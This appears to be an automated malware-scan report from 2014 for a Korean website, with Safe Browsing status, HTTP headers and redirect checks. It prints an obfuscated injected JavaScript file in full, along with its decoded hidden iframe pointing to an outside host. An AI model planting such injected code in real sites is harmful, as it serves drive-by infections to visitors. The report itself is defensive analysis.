Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medicos.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://medicos.co.kr/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Tue, 26 Aug 2014 20:28:25 GMT Location: /index.asp Server: Microsoft-IIS/6.0 Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQAABQCR=LGEJDPDCNDIMBABKOMPOALDD; path=/ X-Powered-By: ASP.NET | clean |
http://medicos.co.kr/index.asp | 200 OK Content-Length: 767 Content-Type: text/html | clean |
http://www.samwooind.co.kr/fckeditor/top.js | 200 OK Content-Length: 602 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _$=['\x77\x61\x6e\x67','\x77\x61\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x67\x70\x61\x6e\x2e\x63\x6f\x2e\x6b\x72\x2f\x64\x61\x74\x61\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x31\x30\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf( _$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie= _$[1]+a.toGMTString();document.write( _$[2])} Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://medicos.co.kr/test404page.js | 404 Not Found Content-Length: 92 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medicos.co.kr
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Tue, 26 Aug 2014 20:28:25 GMT
Location: /index.asp
Server: Microsoft-IIS/6.0
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAABQCR=LGEJDPDCNDIMBABKOMPOALDD; path=/
X-Powered-By: ASP.NET
...131 bytes of data.
GET / HTTP/1.1
Host: medicos.co.kr
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Tue, 26 Aug 2014 20:28:25 GMT
Location: /index.asp
Server: Microsoft-IIS/6.0
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAABQCR=LGEJDPDCNDIMBABKOMPOALDD; path=/
X-Powered-By: ASP.NET
...131 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: medicos.co.kr
Referer: http://www.google.com/search?q=medicos.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: medicos.co.kr
Referer: http://www.google.com/search?q=medicos.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.